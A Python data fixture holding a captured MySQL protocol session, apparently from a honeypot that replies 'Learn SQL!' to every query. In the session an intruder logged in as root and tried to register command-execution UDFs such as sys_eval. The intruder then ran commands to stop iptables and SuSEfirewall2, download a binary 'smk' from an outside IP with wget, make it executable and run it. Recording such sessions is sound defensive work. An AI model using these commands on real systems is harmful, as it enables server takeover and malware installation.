stream = [('out', b'4\x00\x00\x00\x0a5.7.16\x00\x00\x00\x12gaaaaaaaa\x00,\xa2!\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00            \x00'),
('in', b':\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x14\x0b\xf8;\x8e\xc4\x86\xac\xd1\xb7\x1c.mX69\xdaE\xed\xaf#'),
('out', b'\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00'),
('in', b'=\x00\x00\x00\x03CREATE FUNCTION sys_eval RETURNS string SONAME \x27mysqludf.so\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'?\x00\x00\x00\x03CREATE FUNCTION sys_eval RETURNS string SONAME \x27mysqludf64.so\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'A\x00\x00\x00\x03CREATE FUNCTION sys_eval RETURNS string SONAME \x27lib_mysqludf.so\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'8\x00\x00\x00\x03CREATE FUNCTION sys_eval RETURNS string SONAME \x27udf.so\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03CREATE FUNCTION sys_eval RETURNS string SONAME \x27xiaoji64.so\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION sys_eval RETURNS string SONAME \x27xiaoji.so\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'<\x00\x00\x00\x03CREATE FUNCTION sys_eval RETURNS string SONAME \x27liunx32.so\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'<\x00\x00\x00\x03CREATE FUNCTION sys_eval RETURNS string SONAME \x27liunx64.so\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'E\x00\x00\x00\x03create function sys_eval returns string soname "lib_mysqludf_sys.so"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'J\x00\x00\x00\x03CREATE FUNCTION mylab_sys_exec RETURNS INTEGER SONAME "mylab_sys_exec.so"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'*\x00\x00\x00\x03system wget http://222.186.50.67:5236/smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x14\x00\x00\x00\x03system chmod +x smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x15\x00\x00\x00\x03system chmod 777 smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x15\x00\x00\x00\x03system chmod u+x smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x16\x00\x00\x00\x03system chmod 0775 smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x16\x00\x00\x00\x03system chmod 0777 smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x0d\x00\x00\x00\x03system ./smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\xa6\x00\x00\x00\x03select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.50.67:5236/smk;chmod 777 smk;./smk;")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'0\x00\x00\x00\x03SELECT mylab_sys_exec(/etc/init.d/iptables stop'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x16\x00\x00\x00\x03service iptables stop'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x13\x00\x00\x00\x03SuSEfirewall2 stop'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x15\x00\x00\x00\x03reSuSEfirewall2 stop'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'&\x00\x00\x00\x03wget -c http://222.186.50.67:5236/smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x0e\x00\x00\x00\x03chmod 777 smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x06\x00\x00\x00\x03./smk'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\xb9\x00\x00\x00\x03");\x0aDrop FUNCTION IF EXISTS lib_mysqludf_sys_info;\x0aDrop FUNCTION IF EXISTS sys_get;\x0aDrop FUNCTION IF EXISTS sys_set;\x0aDrop FUNCTION IF EXISTS sys_exec;\x0aDrop FUNCTION IF EXISTS sys_eval;'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x01\x00\x00\x00\x01')]